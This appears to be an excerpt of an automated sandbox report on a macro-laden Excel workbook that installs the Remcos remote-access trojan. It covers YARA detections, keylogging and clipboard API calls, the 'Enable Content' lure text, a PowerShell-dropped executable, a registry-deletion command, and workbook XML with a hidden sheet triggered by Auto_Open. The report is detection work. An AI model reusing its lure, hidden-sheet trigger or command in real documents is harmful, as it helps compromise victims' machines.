https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_co
Source: logagent.exe, 00000024.00000003.421925979.0000000004EE8000.00000004.00000001.sdmp	String found in binary or memory: https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287res://C:\Windows\system32\mmcndmgr.dll/views.htmhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_co
Source: logagent.exe, 00000024.00000003.421925979.0000000004EE8000.00000004.00000001.sdmp	String found in binary or memory: https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287res://C:\Windows\system32\mmcndmgr.dll/views.htmhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_co
Source: logagent.exe, 00000024.00000003.418244527.0000000004EE8000.00000004.00000001.sdmp	String found in binary or memory: https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287res://C:\Windows\system32\mmcndmgr.dll/views.htmhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_co
Source: logagent.exe, 00000024.00000003.418244527.0000000004EE8000.00000004.00000001.sdmp	String found in binary or memory: https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287res://C:\Windows\system32\mmcndmgr.dll/views.htmhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_co
Source: logagent.exe, 00000024.00000002.422711072.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: logagent.exe, 00000024.00000002.422711072.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 24_2_004089BA GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,

24_2_004089BA

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 24_2_00409BD9 OpenClipboard,GetClipboardData,CloseClipboard,

24_2_00409BD9

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 24_2_00409BD9 OpenClipboard,GetClipboardData,CloseClipboard,

24_2_00409BD9

E-Banking Fraud:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 24.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.logagent.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.logagent.exe.10591a73.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.logagent.exe.10591a73.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.logagent.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.logagent.exe.10591a73.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.logagent.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.logagent.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.logagent.exe.10591a73.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002C.00000002.500969546.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.512423123.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.509224017.0000000002748000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.456970464.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: logagent.exe PID: 5572, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: logagent.exe PID: 3360, type: MEMORYSTR

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 24.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 44.2.logagent.exe.10590000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.logagent.exe.10591a73.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 44.2.logagent.exe.10591a73.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 44.2.logagent.exe.250000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 44.2.logagent.exe.10591a73.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 44.2.logagent.exe.10590000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 44.2.logagent.exe.250000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.logagent.exe.10591a73.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000002C.00000002.500969546.0000000000250000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000002C.00000002.512423123.0000000010590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000018.00000002.456970464.0000000010590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Document image extraction number: 0	Screenshot OCR: Enable Editing and Enable Content from the yellow bar above. It will allow you to open any files w
Source: Document image extraction number: 0	Screenshot OCR: Enable Content from the yellow bar above. It will allow you to open any files with new system of e
Source: Document image extraction number: 1	Screenshot OCR: Enable Editing and Enable Content from the yellow bar above. It will allow you to open any files w
Source: Document image extraction number: 1	Screenshot OCR: Enable Content from the yellow bar above. It will allow you to open any files with new system of e

Powershell drops PE file

Show sources

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\filesvr.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_07B03368	4_2_07B03368
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_07B03358	4_2_07B03358
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_07B09EB0	4_2_07B09EB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_07B09EA0	4_2_07B09EA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_07B08D90	4_2_07B08D90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_07B08D80	4_2_07B08D80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_082E8C60	4_2_082E8C60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_082E8C60	4_2_082E8C60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_082E0024	4_2_082E0024
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_082E0040	4_2_082E0040
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_0041AAA0	24_2_0041AAA0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_004340D5	24_2_004340D5
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_00423098	24_2_00423098
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_00411205	24_2_00411205
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_0043820B	24_2_0043820B
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_004223C0	24_2_004223C0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_0044D3FA	24_2_0044D3FA
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_0043843A	24_2_0043843A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_0043450A	24_2_0043450A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_00419521	24_2_00419521
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_0044B5AB	24_2_0044B5AB
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_00431670	24_2_00431670
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_0042E6D5	24_2_0042E6D5
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_004516E0	24_2_004516E0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_004337C1	24_2_004337C1
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_004228B7	24_2_004228B7
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_0043493F	24_2_0043493F
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_0043FA50	24_2_0043FA50
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_00430BBE	24_2_00430BBE

Source: filesvr.exe.4.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: filesvr.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Srakjle.exe.20.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Srakjle.exe.20.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f

Source: workbook.xml

Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="24326"/><workbookPr codeName="ThisWorkbook" defaultThemeVersion="166925"/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Administrator\Desktop\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{43B665A2-4228-4DEE-9AA0-EE7EBB0B9A5C}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" firstSheet="1" activeTab="1" xr2:uid="{9E16D823-67BF-491A-BD2C-88B707EE8CD5}"/></bookViews><sheets><sheet name="zk3hnl" sheetId="2" state="hidden" r:id="rId1"/><sheet name="Sheet1" sheetId="1" r:id="rId2"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">zk3hnl!$E$6</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>

Source: 24.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 44.2.logagent.exe.10590000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.logagent.exe.10591a73.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 44.2.logagent.exe.10591a73.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 44.2.logagent.exe.250000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
